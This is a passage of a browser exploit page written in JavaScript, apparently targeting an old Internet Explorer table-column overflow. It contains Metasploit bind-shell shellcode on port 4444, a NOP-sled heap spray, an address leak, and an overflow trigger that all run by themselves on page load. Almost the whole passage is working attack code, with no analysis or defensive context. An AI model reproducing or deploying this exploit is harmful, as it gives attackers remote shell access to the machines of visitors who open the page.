// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1245880";
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>